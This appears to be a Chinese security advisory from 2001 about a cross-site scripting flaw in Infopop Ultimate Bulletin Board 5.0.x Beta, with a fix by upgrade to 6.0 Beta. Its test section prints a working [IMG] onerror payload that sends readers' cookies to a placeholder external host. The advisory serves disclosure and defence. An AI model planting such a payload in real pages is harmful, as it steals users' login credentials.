安全研究
安全漏洞
UBB [IMG] 标签嵌入Javascript漏洞
发布日期:2001-03-01
更新日期:2001-03-01
受影响系统:
Infopop Ultimate Bulletin Board 5.0.x Beta
- Sun Solaris 8.0
- RedHat Linux 7.0
- OpenBSD OpenBSD 2.8
- HP HP-UX 11.11
- Debian Linux 2.2
- Caldera eServer 2.3
- BSDI BSD/OS 4.0.1
不受影响系统:
Infopop Ultimate Bulletin Board 6.0 Beta
描述:
BUGTRAQ ID: 2408
Ultimate Bulletin Board 是 Infopop 开发的免费软件包,一种基于WWW界面的电子
公告板。上述beta版存在一个设计上的漏洞。由于对用户输入检查不充分,有可能在
[img]标签中嵌入单行javascript然后贴到讨论组上去,其他用户阅读回复该条消息
时,javascript被执行。UBB使用cookie技术记录登录用户的敏感信息,诸如用户名、
口令等等,cookie是保存在客户端的。利用前面描述的漏洞,恶意的远程用户有可能
获取其他用户的cookie。
<* 来源:Scott Ashman (
sashman@jaspin.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
在文章中嵌入下列代码:
[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);
[/IMG]
则任何用户在回复此消息时将导致他们的cookie内容被转发给一个外部主机。
建议:
厂商补丁:
升级到Ultimate Bulletin Board 6.0 Beta即可:
Infopop upgrade Ultimate Bulletin Board 6.0 Beta
http://www.infopop.com/nonbusiness/nonbusiness_ubb.html
浏览次数:10025
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |